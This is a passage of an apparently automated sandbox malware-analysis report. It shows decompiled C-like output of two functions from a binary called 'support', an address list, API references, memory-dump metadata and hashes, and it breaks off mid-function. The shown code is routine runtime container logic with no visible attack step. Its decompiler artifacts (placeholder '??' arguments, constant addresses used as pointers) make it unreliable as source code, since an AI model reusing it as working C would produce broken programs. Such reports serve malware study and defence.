				_push(E003BF828);
				_push( *[fs:0x0]);
				_t260 = _t259 - 0x18;
				_t97 =  *0x3c500c; // 0x4b5ee95b
				_t98 = _t97 ^ _t254;
				_v24 = _t98;
				_push(__ebx);
				_push(_t235);
				_push(__edi);
				_push(_t98);
				 *[fs:0x0] =  &_v16;
				_v20 = _t260;
				_t100 = _a8;
				_t221 = _a4;
				_t183 = _t100 - _t221;
				_v40 = _t100;
				 *0x6f6304 = 0;
				 *0x6f6308 = 0;
				_t211 = (0x92492493 * _t183 >> 0x20) + _t183 >> 4;
				 *0x6f630c = 0;
				_t105 = ((0x92492493 * _t183 >> 0x20) + _t183 >> 4 >> 0x1f) + ((0x92492493 * _t183 >> 0x20) + _t183 >> 4);
				if(_t105 == 0) {
					L13:
					 *[fs:0x0] = _v16;
					__eflags = _v24 ^ _t254;
					return E003BE3D0(_v24 ^ _t254);
				} else {
					if(_t105 > 0x9249249) {
						E003B5F70(_t183);
						E003B50C0(_t221, _t235);
						_push(0);
						_push(0);
						L003BF2CD();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t254);
						_t255 = _t260;
						_t261 = _t260 - 8;
						_push(__ebx);
						_t172 = _t183;
						_push(_t235);
						_push(_t221);
						_t212 =  *(_t172 + 0x10);
						_v72 = _t212;
						__eflags = 0x7fffffff - _t212 - 1;
						if(0x7fffffff - _t212 < 1) {
							L003B5DC0(_t172, 0x7fffffff, _t221, _t235);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t255);
							_t256 = _t261;
							_t262 = _t261 - 0x10;
							_push(_t172);
							_v104 = _v72;
							_push(_t235);
							_t213 =  *0x8000000F;
							_t237 = _v80;
							_v92 = _t213;
							_push(_t221);
							__eflags = 0x7fffffff - _t213 - _t237;
							if(0x7fffffff - _t213 < _t237) {
								_t115 = L003B5DC0(0x7fffffff, 0x7fffffff, _t221, _t237);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t256);
								_t257 = _t262;
								_push(_t221);
								_t223 = _t213;
								__eflags = 0x7fffffff - _t223;
								if(0x7fffffff == _t223) {
									L64:
									return _t115;
								} else {
									_push(_t237);
									_t238 = 0x80000017;
									do {
										_t190 =  *_t238;
										__eflags = _t190 - 0x10;
										if(_t190 < 0x10) {
											goto L62;
										} else {
											_t116 =  *((intOrPtr*)(_t238 - 0x14));
											_t191 = _t190 + 1;
											__eflags = _t191 - 0x1000;
											if(_t191 < 0x1000) {
												L61:
												_push(_t191);
												E003BE78C(_t116, _t116);
												_t262 = _t262 + 8;
												goto L62;
											} else {
												_t214 =  *((intOrPtr*)(_t116 - 4));
												_t191 = _t191 + 0x23;
												__eflags = _t116 - _t214 + 0xfffffffc - 0x1f;
												if(_t116 - _t214 + 0xfffffffc > 0x1f) {
													__imp___invalid_parameter_noinfo_noreturn();
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_t240 = _t191;
													asm("xorps xmm0, xmm0");
													 *_t240 = 0x3c13f8;
													asm("movq [eax], xmm0");
													_t122 = _v120 + 4;
													__eflags = _t122;
													__imp____std_exception_copy(_t122, _t240 + 4, _t238, _t257);
													 *_t240 = 0x3c14c0;
													return _t240;
												} else {
													_t116 = _t214;
													goto L61;
												}
											}
										}
										goto L66;
										L62:
										 *(_t238 - 4) = 0;
										 *_t238 = 0xf;
										 *((char*)(_t238 - 0x14)) = 0;
										_t238 = _t238 + 0x1c;
										_t93 = _t238 - 0x18; // 0xc9c314
										_t115 = _t93;
										__eflags = _t115 - _t223;
									} while (_t115 != _t223);
									goto L64;
								}
							} else {
								_t225 =  *0x80000013;
								_t124 = _t213 + _t237;
								_v20 = _t124;
								_t243 = _t124 | 0x0000000f;
								_v24 = _t225;
								__eflags = _t243 - 0x7fffffff;
								if(__eflags <= 0) {
									_t126 = _t225 >> 1;
									__eflags = _t225 - 0x7fffffff - _t126;
									if(__eflags <= 0) {
										_t127 = _t225 + _t126;
										__eflags = _t243 - _t127;
										_t244 =  <  ? _t127 : _t243;
										__eflags = _t244;
									} else {
										_t244 = 0x7fffffff;
									}
								} else {
									_t244 = 0x7fffffff;
								}
								_t196 =  ~(0 | __eflags > 0x00000000) | _t244 + 0x00000001;
								__eflags = _t196 - 0x1000;
								if(_t196 < 0x1000) {
									__eflags = _t196;
									if(_t196 == 0) {
										_t225 = 0;
										__eflags = 0;
									} else {
										_push(_t196);
										_t142 = E003BE3E1();
										_t213 = _v16;
										_t262 = _t262 + 4;
										_t225 = _t142;
									}
									goto L47;
								} else {
									_t65 = _t196 + 0x23; // 0x23
									_t143 = _t65;
									__eflags = _t143 - _t196;
									_t144 =  <=  ? _t213 | 0xffffffff : _t143;
									_push( <=  ? _t213 | 0xffffffff : _t143);
									_t145 = E003BE3E1();
									_t262 = _t262 + 4;
									__eflags = _t145;
									if(_t145 == 0) {
										L52:
										__imp___invalid_parameter_noinfo_noreturn();
										goto L53;
									} else {
										_t213 = _v16;
										_t67 = _t145 + 0x23; // 0x23
										_t225 = _t67 & 0xffffffe0;
										 *(_t225 - 4) = _t145;
										L47:
										 *((intOrPtr*)(0x7fffffff + 0x10)) = _v20;
										 *(0x7fffffff + 0x14) = _t244;
										_t244 = _t225 + _t213;
										_v20 = _t244;
										__eflags = _v24 - 0x10;
										_v16 = _t244 + _a8;
										_push(_t213);
										if(_v24 < 0x10) {
											L53:
											memcpy(_t225, 0x7fffffff, ??);
											memcpy(_t244, _v28, _a8);
											 *_v16 = 0;
											 *0x7fffffff = _t225;
											return 0x7fffffff;
										} else {
											_t246 =  *0x7fffffff;
											memcpy(_t225, _t246, ??);
											memcpy(_v20, _v28, _a8);
											_t139 = _v16;
											_t262 = _t262 + 0x18;
											_t198 = _v24 + 1;
											 *_v16 = 0;
											__eflags = _t198 - 0x1000;
											if(_t198 < 0x1000) {
												L51:
												_push(_t198);
												E003BE78C(_t139, _t246);
												 *0x7fffffff = _t225;
												return 0x7fffffff;
											} else {
												_t215 =  *(_t246 - 4);
												_t198 = _t198 + 0x23;
												_t244 = _t246 - _t215;
												_t84 = _t244 - 4; // 0x7ffffffb
												_t139 = _t84;
												__eflags = _t84 - 0x1f;
												if(_t84 > 0x1f) {
													goto L52;
												} else {
													_t246 = _t215;
													goto L51;
												}
											}
										}
									}
								}
							}
						} else {
							_t248 =  *(_t172 + 0x14);
							_t230 = _t212 + 0x00000001 | 0x0000000f;
							_v16 = _t248;
							__eflags = _t230 - 0x7fffffff;
							if(__eflags <= 0) {
								_t147 = _t248 >> 1;
								__eflags = _t248 - 0x7fffffff - _t147;
								if(__eflags <= 0) {
									_t148 = _t248 + _t147;
									__eflags = _t230 - _t148;
									_t231 =  <  ? _t148 : _t230;
								} else {
									_t231 = 0x7fffffff;
								}
							} else {
								_t231 = 0x7fffffff;
							}
							_t203 =  ~(0 | __eflags > 0x00000000) | _t231 + 0x00000001;
							__eflags = _t203 - 0x1000;
							if(_t203 < 0x1000) {
								__eflags = _t203;
								if(_t203 == 0) {
									_t248 = 0;
									__eflags = 0;
								} else {
									_push(_t203);
									_t158 = E003BE3E1();
									_t212 = _v12;
									_t261 = _t261 + 4;
									_t248 = _t158;
								}
								goto L27;
							} else {
								_t35 = _t203 + 0x23; // 0x23
								_t159 = _t35;
								__eflags = _t159 - _t203;
								_t160 =  <=  ? _t212 | 0xffffffff : _t159;
								_push( <=  ? _t212 | 0xffffffff : _t159);
								_t161 = E003BE3E1();
								_t261 = _t261 + 4;
								__eflags = _t161;
								if(_t161 == 0) {
									L32:
									__imp___invalid_parameter_noinfo_noreturn();
									goto L33;
								} else {
									_t212 = _v12;
									_t37 = _t161 + 0x23; // 0x23
									_t248 = _t37 & 0xffffffe0;
									 *(_t248 - 4) = _t161;
									L27:
									__eflags = _v16 - 0x10;
									 *(_t172 + 0x14) = _t231;
									_t231 = _t248 + _t212;
									 *(_t172 + 0x10) = _t212 + 1;
									_v12 = _t231;
									_push(_t212);
									if(_v16 < 0x10) {
										L33:
										memcpy(_t248, _t172, ??);
										 *_t231 = _a8;
										 *(_t231 + 1) = 0;
										 *_t172 = _t248;
										return _t172;
									} else {
										_t233 =  *_t172;
										memcpy(_t248, _t233, ??);
										_t205 = _v12;
										_t261 = _t261 + 0xc;
										_t155 = _a8;
										 *_t205 = _a8;
										 *((char*)(_t205 + 1)) = 0;
										_t207 = _v16 + 1;
										__eflags = _t207 - 0x1000;
										if(_t207 < 0x1000) {
											L31:
											_push(_t207);
											E003BE78C(_t155, _t233);
											 *_t172 = _t248;
											return _t172;
										} else {
											_t217 =  *(_t233 - 4);
											_t207 = _t207 + 0x23;
											_t231 = _t233 - _t217;
											_t155 = _t231 - 4;
											__eflags = _t231 - 4 - 0x1f;
											if(_t231 - 4 > 0x1f) {
												goto L32;
											} else {
												_t233 = _t217;
												goto L31;
											}
										}
									}
								}
							}
						}
					} else {
						_t180 = _t105 * 8 - _t105 << 2;
						if(_t180 < 0x1000) {
							L6:
							__eflags = _t180;
							if(_t180 == 0) {
								_t252 = 0;
								__eflags = 0;
							} else {
								_push(_t180);
								_t166 = E003BE3E1();
								_t260 = _t260 + 4;
								_t252 = _t166;
							}
						} else {
							_t167 = _t180 + 0x23;
							_t183 = _t183 | 0xffffffff;
							_t168 =  <=  ? _t183 : _t167;
							_push( <=  ? _t183 : _t167);
							_t169 = E003BE3E1();
							_t260 = _t260 + 4;
							if(_t169 == 0) {
								__imp___invalid_parameter_noinfo_noreturn();
								goto L6;
							} else {
								_t13 = _t169 + 0x23; // 0x23
								_t252 = _t13 & 0xffffffe0;
								 *((intOrPtr*)(_t252 - 4)) = _t169;
							}
						}
						_v8 = 0;
						asm("xorps xmm0, xmm0");
						_v28 = 0;
						asm("movq [ebp-0x20], xmm0");
						 *0x6f6304 = _t252;
						 *0x6f6308 = _t252;
						 *0x6f630c = _t180 + _t252;
						_v36 = _t252;
						_v32 = _t252;
						_v28 = 0x6f6304;
						_t181 = _v40;
						_v8 = 1;
						while(_t221 != _t181) {
							_t23 = _t252 + 4; // -24
							_t183 = _t23;
							 *_t252 =  *_t221;
							E003B4F40(_t183, _t211, _t221 + 4);
							_t252 = _t252 + 0x1c;
							_t221 = _t221 + 0x1c;
							_v32 = _t252;
						}
						_push(_t183);
						L55();
						 *0x6f6308 = _t252;
						goto L13;
					}
				}
				L66:
			}

0x003b5833
0x003b5835
0x003b5840
0x003b5841
0x003b5844
0x003b5849
0x003b584b
0x003b584e
0x003b584f
0x003b5850
0x003b5851
0x003b5855
0x003b585b
0x003b585e
0x003b5863
0x003b5866
0x003b5868
0x003b5872
0x003b587e
0x003b5888
0x003b588d
0x003b589a
0x003b589c
0x003b5972
0x003b5975
0x003b5983
0x003b598d
0x003b58a2
0x003b58a7
0x003b5990
0x003b5995
0x003b599a
0x003b599c
0x003b599e
0x003b59a3
0x003b59a4
0x003b59a5
0x003b59a6
0x003b59a7
0x003b59a8
0x003b59a9
0x003b59aa
0x003b59ab
0x003b59ac
0x003b59ad
0x003b59ae
0x003b59af
0x003b59b0
0x003b59b1
0x003b59b3
0x003b59b6
0x003b59b7
0x003b59c0
0x003b59c1
0x003b59c2
0x003b59c7
0x003b59ca
0x003b59cd
0x003b5ade
0x003b5ae3
0x003b5ae4
0x003b5ae5
0x003b5ae6
0x003b5ae7
0x003b5ae8
0x003b5ae9
0x003b5aea
0x003b5aeb
0x003b5aec
0x003b5aed
0x003b5aee
0x003b5aef
0x003b5af0
0x003b5af1
0x003b5af3
0x003b5af9
0x003b5afc
0x003b5b06
0x003b5b07
0x003b5b0c
0x003b5b0f
0x003b5b12
0x003b5b13
0x003b5b15
0x003b5c44
0x003b5c49
0x003b5c4a
0x003b5c4b
0x003b5c4c
0x003b5c4d
0x003b5c4e
0x003b5c4f
0x003b5c50
0x003b5c51
0x003b5c53
0x003b5c54
0x003b5c56
0x003b5c58
0x003b5cab
0x003b5cad
0x003b5c5a
0x003b5c5a
0x003b5c5b
0x003b5c60
0x003b5c60
0x003b5c62
0x003b5c65
0x00000000
0x003b5c67
0x003b5c67
0x003b5c6a
0x003b5c6b
0x003b5c71
0x003b5c85
0x003b5c85
0x003b5c87
0x003b5c8c
0x00000000
0x003b5c73
0x003b5c73
0x003b5c76
0x003b5c7e
0x003b5c81
0x003b5cae
0x003b5cb4
0x003b5cb5
0x003b5cb6
0x003b5cb7
0x003b5cb8
0x003b5cb9
0x003b5cba
0x003b5cbb
0x003b5cbc
0x003b5cbd
0x003b5cbe
0x003b5cbf
0x003b5cc4
0x003b5cc6
0x003b5ccd
0x003b5cd3
0x003b5cda
0x003b5cda
0x003b5cde
0x003b5ce7
0x003b5cf1
0x003b5c83
0x003b5c83
0x00000000
0x003b5c83
0x003b5c81
0x003b5c71
0x00000000
0x003b5c8f
0x003b5c8f
0x003b5c96
0x003b5c9c
0x003b5ca0
0x003b5ca3
0x003b5ca3
0x003b5ca6
0x003b5ca6
0x00000000
0x003b5caa
0x003b5b1b
0x003b5b1b
0x003b5b1e
0x003b5b23
0x003b5b26
0x003b5b29
0x003b5b2c
0x003b5b2e
0x003b5b36
0x003b5b3a
0x003b5b3c
0x003b5b45
0x003b5b47
0x003b5b49
0x003b5b49
0x003b5b3e
0x003b5b3e
0x003b5b3e
0x003b5b30
0x003b5b30
0x003b5b30
0x003b5b58
0x003b5b5a
0x003b5b60
0x003b5b8c
0x003b5b8e
0x003b5ba0
0x003b5ba0
0x003b5b90
0x003b5b90
0x003b5b91
0x003b5b96
0x003b5b99
0x003b5b9c
0x003b5b9c
0x00000000
0x003b5b62
0x003b5b62
0x003b5b62
0x003b5b68
0x003b5b6a
0x003b5b6d
0x003b5b6e
0x003b5b73
0x003b5b76
0x003b5b78
0x003b5c15
0x003b5c15
0x00000000
0x003b5b7e
0x003b5b7e
0x003b5b81
0x003b5b84
0x003b5b87
0x003b5ba2
0x003b5ba5
0x003b5bab
0x003b5bae
0x003b5bb3
0x003b5bb6
0x003b5bba
0x003b5bbd
0x003b5bbe
0x003b5c1b
0x003b5c1d
0x003b5c29
0x003b5c34
0x003b5c39
0x003b5c41
0x003b5bc0
0x003b5bc0
0x003b5bc4
0x003b5bd2
0x003b5bd7
0x003b5bda
0x003b5be0
0x003b5be1
0x003b5be4
0x003b5bea
0x003b5bfe
0x003b5bfe
0x003b5c00
0x003b5c08
0x003b5c12
0x003b5bec
0x003b5bec
0x003b5bef
0x003b5bf2
0x003b5bf4
0x003b5bf4
0x003b5bf7
0x003b5bfa
0x00000000
0x003b5bfc
0x003b5bfc
0x00000000
0x003b5bfc
0x003b5bfa
0x003b5bea
0x003b5bbe
0x003b5b78
0x003b5b60
0x003b59d3
0x003b59d3
0x003b59d9
0x003b59dc
0x003b59df
0x003b59e1
0x003b59e9
0x003b59ed
0x003b59ef
0x003b59f8
0x003b59fa
0x003b59fc
0x003b59f1
0x003b59f1
0x003b59f1
0x003b59e3
0x003b59e3
0x003b59e3
0x003b5a0b
0x003b5a0d
0x003b5a13
0x003b5a3f
0x003b5a41
0x003b5a53
0x003b5a53
0x003b5a43
0x003b5a43
0x003b5a44
0x003b5a49
0x003b5a4c
0x003b5a4f
0x003b5a4f
0x00000000
0x003b5a15
0x003b5a15
0x003b5a15
0x003b5a1b
0x003b5a1d
0x003b5a20
0x003b5a21
0x003b5a26
0x003b5a29
0x003b5a2b
0x003b5ab8
0x003b5ab8
0x00000000
0x003b5a31
0x003b5a31
0x003b5a34
0x003b5a37
0x003b5a3a
0x003b5a55
0x003b5a55
0x003b5a5c
0x003b5a5f
0x003b5a62
0x003b5a65
0x003b5a68
0x003b5a69
0x003b5abe
0x003b5ac0
0x003b5acb
0x003b5acf
0x003b5ad3
0x003b5adb
0x003b5a6b
0x003b5a6b
0x003b5a6f
0x003b5a74
0x003b5a77
0x003b5a7a
0x003b5a7d
0x003b5a7f
0x003b5a86
0x003b5a87
0x003b5a8d
0x003b5aa1
0x003b5aa1
0x003b5aa3
0x003b5aab
0x003b5ab5
0x003b5a8f
0x003b5a8f
0x003b5a92
0x003b5a95
0x003b5a97
0x003b5a9a
0x003b5a9d
0x00000000
0x003b5a9f
0x003b5a9f
0x00000000
0x003b5a9f
0x003b5a9d
0x003b5a8d
0x003b5a69
0x003b5a2b
0x003b5a13
0x003b58ad
0x003b58b6
0x003b58bf
0x003b58ea
0x003b58ea
0x003b58ec
0x003b58fb
0x003b58fb
0x003b58ee
0x003b58ee
0x003b58ef
0x003b58f4
0x003b58f7
0x003b58f7
0x003b58c1
0x003b58c1
0x003b58c4
0x003b58c9
0x003b58cc
0x003b58cd
0x003b58d2
0x003b58d7
0x003b58e4
0x00000000
0x003b58d9
0x003b58d9
0x003b58dc
0x003b58df
0x003b58df
0x003b58d7
0x003b58fd
0x003b5907
0x003b590a
0x003b5911
0x003b5916
0x003b591c
0x003b5922
0x003b5927
0x003b592a
0x003b592d
0x003b5934
0x003b5937
0x003b5940
0x003b5946
0x003b5946
0x003b5949
0x003b594f
0x003b5954
0x003b5957
0x003b595a
0x003b595a
0x003b595f
0x003b5964
0x003b596c
0x00000000
0x003b596c
0x003b58a7
0x00000000

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003B58E4
_CxxThrowException.VCRUNTIME140(00000000,00000000,4B5EE95B,?,?), ref: 003B599E

Part of subcall function 003BE3E1: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(006F5B9C,?,003B5E90,00000000,?,006F5B9C), ref: 003BE3F6

Strings

[^K/, xrefs: 003B5844

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: ExceptionThrow_invalid_parameter_noinfo_noreturnmalloc
String ID: [^K/
API String ID: 42831207-4166871755
Opcode ID: fa3ad11ccce3e2d4ffdbe865c6628633b4bedc199c8ff043ba27942982b895a2
Instruction ID: 39de213d706ddbd5168599c2e600635f40e1e1542d4804e27d665d1e883de253
Opcode Fuzzy Hash: fa3ad11ccce3e2d4ffdbe865c6628633b4bedc199c8ff043ba27942982b895a2
Instruction Fuzzy Hash: 7F41F3B2A007089BDB01DF68DC817EDBBE9EB48718F11522AF505E7682E770A904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003B56B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E003B56B0(void* __ebx, void* __edi, int _a4, signed int _a8) {
				void* _v8;
				void* _v12;
				signed int _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr* _v60;
				char _v80;
				intOrPtr _v84;
				signed int _v88;
				intOrPtr _v104;
				signed int _v136;
				intOrPtr _v144;
				signed int _v156;
				signed int _v168;
				intOrPtr _v184;
				void* __esi;
				signed int _t124;
				signed int _t125;
				signed int _t127;
				signed int _t132;
				signed int _t137;
				signed int _t138;
				intOrPtr _t140;
				signed int _t145;
				void* _t155;
				intOrPtr _t156;
				void* _t162;
				signed int _t164;
				unsigned int _t166;
				void* _t167;
				void* _t182;
				void* _t183;
				void* _t185;
				unsigned int _t187;
				void* _t188;
				void* _t198;
				void* _t199;
				void* _t201;
				signed int _t206;
				void* _t207;
				void* _t209;
				void* _t214;
				void* _t215;
				intOrPtr _t217;
				void* _t221;
				signed int _t229;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t242;
				intOrPtr _t249;
				intOrPtr* _t250;
				void* _t255;
				void* _t257;
				signed int _t262;
				signed int _t264;
				void* _t266;
				signed int _t275;
				signed int _t276;
				intOrPtr _t277;
				void* _t278;
				void* _t280;
				void* _t285;
				intOrPtr* _t287;
				signed int _t289;
				void* _t291;
				signed int _t296;
				void* _t297;
				void* _t299;
				void* _t301;
				intOrPtr _t304;
				intOrPtr* _t305;
				intOrPtr* _t307;
				signed int _t310;
				void* _t311;
				void* _t313;
				void* _t315;
				signed int _t319;
				void* _t321;
				signed int _t323;
				signed int _t324;
				intOrPtr _t325;
				void* _t326;
				void* _t327;
				void* _t329;
				signed int _t330;
				intOrPtr _t331;
				void* _t332;
				void* _t333;

				_push(0xffffffff);
				_push(E003BF7F8);
				_push( *[fs:0x0]);
				_t330 = _t329 - 0x18;
				_t124 =  *0x3c500c; // 0x4b5ee95b
				_t125 = _t124 ^ _t323;
				_v24 = _t125;
				_push(__ebx);
				_push(_t301);
				_push(__edi);
				_push(_t125);
				 *[fs:0x0] =  &_v16;
				_v20 = _t330;
				_t127 = _a8;
				_t285 = _a4;
				_t236 = _t127 - _t285;
				_v40 = _t127;
				 *0x6f6310 = 0;
				 *0x6f6314 = 0;
				_t271 = (0x92492493 * _t236 >> 0x20) + _t236 >> 4;
				 *0x6f6318 = 0;
				_t132 = ((0x92492493 * _t236 >> 0x20) + _t236 >> 4 >> 0x1f) + ((0x92492493 * _t236 >> 0x20) + _t236 >> 4);
				if(_t132 == 0) {
					L13:
					 *[fs:0x0] = _v16;
					__eflags = _v24 ^ _t323;
					return E003BE3D0(_v24 ^ _t323);
				} else {
					if(_t132 > 0x9249249) {
						E003B5F70(_t236);
						E003B5020(_t285, _t301);
						_push(0);
						_push(0);
						L003BF2CD();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t323);
						_t324 = _t330;
						_push(0xffffffff);
						_push(E003BF828);
						_push( *[fs:0x0]);
						_t331 = _t330 - 0x18;
						_t137 =  *0x3c500c; // 0x4b5ee95b
						_t138 = _t137 ^ _t324;
						_v88 = _t138;
						_push(__ebx);
						_push(_t301);
						_push(_t285);
						_push(_t138);
						 *[fs:0x0] =  &_v80;
						_v84 = _t331;
						_t140 = _v56;
						_t287 = _v60;
						_t242 = _t140 - _t287;
						_v104 = _t140;
						 *0x6f6304 = 0;
						 *0x6f6308 = 0;
						_t274 = (0x92492493 * _t242 >> 0x20) + _t242 >> 4;
						 *0x6f630c = 0;
						_t145 = ((0x92492493 * _t242 >> 0x20) + _t242 >> 4 >> 0x1f) + ((0x92492493 * _t242 >> 0x20) + _t242 >> 4);
						__eflags = _t145;
						if(_t145 == 0) {
							L28:
							 *[fs:0x0] = _v20;
							__eflags = _v28 ^ _t324;
							return E003BE3D0(_v28 ^ _t324);
						} else {
							__eflags = _t145 - 0x9249249;
							if(_t145 > 0x9249249) {
								E003B5F70(_t242);
								E003B50C0(_t287, _t301);
								_push(0);
								_push(0);
								L003BF2CD();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t324);
								_t325 = _t331;
								_t332 = _t331 - 8;
								_push(__ebx);
								_t221 = _t242;
								_push(_t301);
								_push(_t287);
								_t275 =  *(_t221 + 0x10);
								_v136 = _t275;
								__eflags = 0x7fffffff - _t275 - 1;
								if(0x7fffffff - _t275 < 1) {
									L003B5DC0(_t221, 0x7fffffff, _t287, _t301);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t325);
									_t326 = _t332;
									_t333 = _t332 - 0x10;
									_push(_t221);
									_v168 = _v136;
									_push(_t301);
									_t276 =  *0x8000000F;
									_t304 = _v144;
									_v156 = _t276;
									_push(_t287);
									__eflags = 0x7fffffff - _t276 - _t304;
									if(0x7fffffff - _t276 < _t304) {
										_t155 = L003B5DC0(0x7fffffff, 0x7fffffff, _t287, _t304);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t326);
										_t327 = _t333;
										_push(_t287);
										_t289 = _t276;
										__eflags = 0x7fffffff - _t289;
										if(0x7fffffff == _t289) {
											L79:
											return _t155;
										} else {
											_push(_t304);
											_t305 = 0x80000017;
											do {
												_t249 =  *_t305;
												__eflags = _t249 - 0x10;
												if(_t249 < 0x10) {
													goto L77;
												} else {
													_t156 =  *((intOrPtr*)(_t305 - 0x14));
													_t250 = _t249 + 1;
													__eflags = _t250 - 0x1000;
													if(_t250 < 0x1000) {
														L76:
														_push(_t250);
														E003BE78C(_t156, _t156);
														_t333 = _t333 + 8;
														goto L77;
													} else {
														_t277 =  *((intOrPtr*)(_t156 - 4));
														_t250 = _t250 + 0x23;
														__eflags = _t156 - _t277 + 0xfffffffc - 0x1f;
														if(_t156 - _t277 + 0xfffffffc > 0x1f) {
															__imp___invalid_parameter_noinfo_noreturn();
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_t307 = _t250;
															asm("xorps xmm0, xmm0");
															 *_t307 = 0x3c13f8;
															asm("movq [eax], xmm0");
															_t162 = _v184 + 4;
															__eflags = _t162;
															__imp____std_exception_copy(_t162, _t307 + 4, _t305, _t327);
															 *_t307 = 0x3c14c0;
															return _t307;
														} else {
															_t156 = _t277;
															goto L76;
														}
													}
												}
												goto L81;
												L77:
												 *(_t305 - 4) = 0;
												 *_t305 = 0xf;
												 *((char*)(_t305 - 0x14)) = 0;
												_t305 = _t305 + 0x1c;
												_t120 = _t305 - 0x18; // 0xc9c314
												_t155 = _t120;
												__eflags = _t155 - _t289;
											} while (_t155 != _t289);
											goto L79;
										}
									} else {
										_t291 =  *0x80000013;
										_t164 = _t276 + _t304;
										_v24 = _t164;
										_t310 = _t164 | 0x0000000f;
										_v28 = _t291;
										__eflags = _t310 - 0x7fffffff;
										if(__eflags <= 0) {
											_t166 = _t291 >> 1;
											__eflags = _t291 - 0x7fffffff - _t166;
											if(__eflags <= 0) {
												_t167 = _t291 + _t166;
												__eflags = _t310 - _t167;
												_t311 =  <  ? _t167 : _t310;
											} else {
												_t311 = 0x7fffffff;
											}
										} else {
											_t311 = 0x7fffffff;
										}
										_t255 =  ~(0 | __eflags > 0x00000000) | _t311 + 0x00000001;
										__eflags = _t255 - 0x1000;
										if(_t255 < 0x1000) {
											__eflags = _t255;
											if(_t255 == 0) {
												_t291 = 0;
												__eflags = 0;
											} else {
												_push(_t255);
												_t182 = E003BE3E1();
												_t276 = _v20;
												_t333 = _t333 + 4;
												_t291 = _t182;
											}
											goto L62;
										} else {
											_t92 = _t255 + 0x23; // 0x23
											_t183 = _t92;
											__eflags = _t183 - _t255;
											_t184 =  <=  ? _t276 | 0xffffffff : _t183;
											_push( <=  ? _t276 | 0xffffffff : _t183);
											_t185 = E003BE3E1();
											_t333 = _t333 + 4;
											__eflags = _t185;
											if(_t185 == 0) {
												L67:
												__imp___invalid_parameter_noinfo_noreturn();
												goto L68;
											} else {
												_t276 = _v20;
												_t94 = _t185 + 0x23; // 0x23
												_t291 = _t94 & 0xffffffe0;
												 *(_t291 - 4) = _t185;
												L62:
												 *((intOrPtr*)(0x7fffffff + 0x10)) = _v24;
												 *(0x7fffffff + 0x14) = _t311;
												_t311 = _t291 + _t276;
												_v24 = _t311;
												__eflags = _v28 - 0x10;
												_v20 = _t311 + _a4;
												_push(_t276);
												if(_v28 < 0x10) {
													L68:
													memcpy(_t291, 0x7fffffff, ??);
													memcpy(_t311, _v32, _a4);
													 *_v20 = 0;
													 *0x7fffffff = _t291;
													return 0x7fffffff;
												} else {
													_t313 =  *0x7fffffff;
													memcpy(_t291, _t313, ??);
													memcpy(_v24, _v32, _a4);
													_t179 = _v20;
													_t333 = _t333 + 0x18;
													_t257 = _v28 + 1;
													 *_v20 = 0;
													__eflags = _t257 - 0x1000;
													if(_t257 < 0x1000) {
														L66:
														_push(_t257);
														E003BE78C(_t179, _t313);
														 *0x7fffffff = _t291;
														return 0x7fffffff;
													} else {
														_t278 =  *(_t313 - 4);
														_t257 = _t257 + 0x23;
														_t311 = _t313 - _t278;
														_t111 = _t311 - 4; // 0x7ffffffb
														_t179 = _t111;
														__eflags = _t111 - 0x1f;
														if(_t111 > 0x1f) {
															goto L67;
														} else {
															_t313 = _t278;
															goto L66;
														}
													}
												}
											}
										}
									}
								} else {
